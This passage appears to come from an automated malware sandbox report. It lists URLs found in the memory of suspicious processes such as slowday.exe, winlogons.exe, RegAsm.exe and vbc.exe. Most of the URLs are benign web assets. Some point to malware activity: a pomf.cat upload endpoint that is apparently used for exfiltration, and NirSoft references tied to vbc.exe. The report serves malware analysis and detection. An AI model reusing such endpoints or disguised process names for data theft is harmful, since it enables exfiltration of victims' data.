Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xssM?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xzm6?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yF6n?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yFoT?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yuvA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yxVU?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB7hjL?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBO5Geh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBVuddh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBX2afX?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBi9v6?m=6&o=true&u=true&n=true&w=30&h=30
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnYSFZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvAE74.tmp.6.dr | String found in binary or memory: http://ocsp.digicert.com0
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.dr | String found in binary or memory: http://ocsp.digicert.com0:
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.dr | String found in binary or memory: http://ocsp.digicert.com0B
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.dr | String found in binary or memory: http://ocsp.digicert.com0E
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.dr | String found in binary or memory: http://ocsp.digicert.com0F
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr | String found in binary or memory: http://ocsp.digicert.com0I
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr | String found in binary or memory: http://ocsp.digicert.com0K
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr | String found in binary or memory: http://ocsp.digicert.com0M
Source: bhvAE74.tmp.6.dr | String found in binary or memory: http://ocsp.msocsp.com0
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.dr | String found in binary or memory: http://ocsp.pki.goog/GTSGIAG30
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.dr | String found in binary or memory: http://ocsp.pki.goog/gsr202
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr | String found in binary or memory: http://ocsp.pki.goog/gts1o1core0
Source: bhvBB7.tmp.21.dr | String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr | String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0#
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr | String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0M
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.dr | String found in binary or memory: http://pki.goog/gsr2/GTSGIAG3.crt0)
Source: RegAsm.exe, 00000001.00000002.506893790.0000000002F63000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.506835059.0000000002B03000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pomf.cat/upload.php
Source: slowday.exe, 00000000.00000003.241428213.0000000003B52000.00000040.00001000.00020000.00000000.sdmp, slowday.exe, 00000000.00000003.238788828.0000000003960000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.505252954.0000000000402000.00000020.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000000.241216625.0000000000402000.00000040.00000400.00020000.00000000.sdmp, winlogons.exe, 00000007.00000003.279364172.0000000003792000.00000040.00001000.00020000.00000000.sdmp, winlogons.exe, 00000007.00000003.277164673.0000000003790000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000000.279280828.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000000.279668892.0000000000402000.00000020.00000400.00020000.00000000.sdmp | String found in binary or memory: http://pomf.cat/upload.php&https://a.pomf.cat/
            Source: RegAsm.exe, 00000001.00000002.506893790.0000000002F63000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.506835059.0000000002B03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pomf.cat/upload.phpCContent-Disposition:
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/css/f60532dd-3aac3bb8/directi
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-2923b6c2/directio
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-f8dd99d9/directio
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
            Source: bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyuliQ.img?h=16&w=16&m
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzjSw3.img?h=16&w=16&m
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB16g6qc.img?h=27&w=27&
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17milU.img?h=16&w=16&
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB18T33l.img?h=333&w=31
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19x3nX.img?h=166&w=31
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xCDZ.img?h=75&w=100
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xGDT.img?h=166&w=31
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xMWp.img?h=75&w=100
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xaUu.img?h=166&w=31
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xssM.img?h=75&w=100
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xzm6.img?h=250&w=30
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yF6n.img?h=333&w=31
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yFoT.img?h=75&w=100
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yuvA.img?h=250&w=30
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yxVU.img?h=166&w=31
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7hjL.img?h=16&w=16&m=
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBO5Geh.img?h=16&w=16&m
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&m
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&m
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBi9v6.img?m=6&o=true&u
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnYSFZ.img?h=16&w=16&m
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: http://www.digicert.com/CPS0
            Source: bhvBB7.tmp.21.drString found in binary or memory: http://www.msn.com
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: http://www.msn.com/
            Source: vbc.exe, 00000002.00000003.258216058.0000000002403000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.258299011.0000000002403000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.279720385.0000000002253000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.279640260.0000000002253000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.296935342.00000000009F3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.296911055.00000000009F3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000003.298367793.0000000002273000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000003.298255280.0000000002273000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317442987.0000000000B13000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317218748.0000000000B16000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317551848.0000000000B16000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317159848.0000000000B13000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330268926.0000000000B26000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330801205.0000000000B23000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330228924.0000000000B23000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330817825.0000000000B26000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343596388.0000000002206000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343153268.0000000002203000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343183877.0000000002206000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343529640.0000000002203000.00000004.00000800.00020000.00000000.sdmp, bhv2307.tmp.23.drString found in binary or memory: 
http://www.msn.com/?ocid=iehp
            Source: vbc.exe, 00000002.00000003.258216058.0000000002403000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.258299011.0000000002403000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.279720385.0000000002253000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.279640260.0000000002253000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.296935342.00000000009F3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.296911055.00000000009F3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000003.298367793.0000000002273000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000003.298255280.0000000002273000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317442987.0000000000B13000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317218748.0000000000B16000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317551848.0000000000B16000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317159848.0000000000B13000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330268926.0000000000B26000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330801205.0000000000B23000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330228924.0000000000B23000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330817825.0000000000B26000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343596388.0000000002206000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343153268.0000000002203000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343183877.0000000002206000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343529640.0000000002203000.00000004.00000800.00020000.00000000.sdmp, bhv2307.tmp.23.drString found in binary or memory: 
http://www.msn.com/de-ch/?ocid=iehp
            Source: bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804
            Source: bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplate
            Source: vbc.exe, 00000002.00000002.260540499.000000000019C000.00000004.00000010.00020000.00000000.sdmp, vbc.exe, 00000006.00000002.282611989.0000000000195000.00000004.00000010.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.299301709.000000000019C000.00000004.00000010.00020000.00000000.sdmp, vbc.exe, 0000000A.00000002.301868471.0000000000195000.00000004.00000010.00020000.00000000.sdmp, vbc.exe, 00000013.00000002.320171342.000000000019C000.00000004.00000010.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.333176153.000000000019C000.00000004.00000010.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.346821134.000000000019C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
            Source: vbc.exe, 00000023.00000000.476081488.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
            Source: vbc.exe, 0000000A.00000002.302284910.00000000008F0000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000013.00000002.320338542.0000000000B50000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.333369197.0000000000BA0000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.347050996.0000000000980000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src22
            Source: vbc.exe, 00000002.00000002.261371537.0000000000B8A000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.260277725.0000000000B89000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.282395197.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000006.00000002.282748053.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.298779879.0000000000A49000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.299948440.0000000000A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=447687274835
            Source: bhvBB7.tmp.21.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;g
            Source: vbc.exe, 00000002.00000003.258299011.0000000002403000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.261431821.00000000028EC000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000002.282897476.00000000027EC000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.279720385.0000000002253000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.296935342.00000000009F3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.299972783.000000000275C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000003.298367793.0000000002273000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317442987.0000000000B13000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317243581.0000000000B1F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317551848.0000000000B16000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317402049.0000000000B25000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330335206.0000000000B2F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330749808.0000000000B35000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330801205.0000000000B23000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330817825.0000000000B26000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343596388.0000000002206000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343230278.000000000220F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343427835.0000000002215000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343529640.0000000002203000.00000004.00000800.00020000.00000000.sdmp, bhv2307.tmp.23.dr, bhvCA97.tmp.9.drString found in binary or memory: 
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=68568119166
            Source: bhvBB7.tmp.21.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674
            Source: RegAsm.exe, 00000001.00000002.506893790.0000000002F63000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.506835059.0000000002B03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://a.pomf.cat/
            Source: bhvBB7.tmp.21.drString found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gt
            Source: vbc.exe, 00000002.00000003.258299011.0000000002403000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.279720385.0000000002253000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.296935342.00000000009F3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000003.298367793.0000000002273000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317442987.0000000000B13000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317243581.0000000000B1F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317551848.0000000000B16000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330335206.0000000000B2F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330801205.0000000000B23000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330817825.0000000000B26000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343596388.0000000002206000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 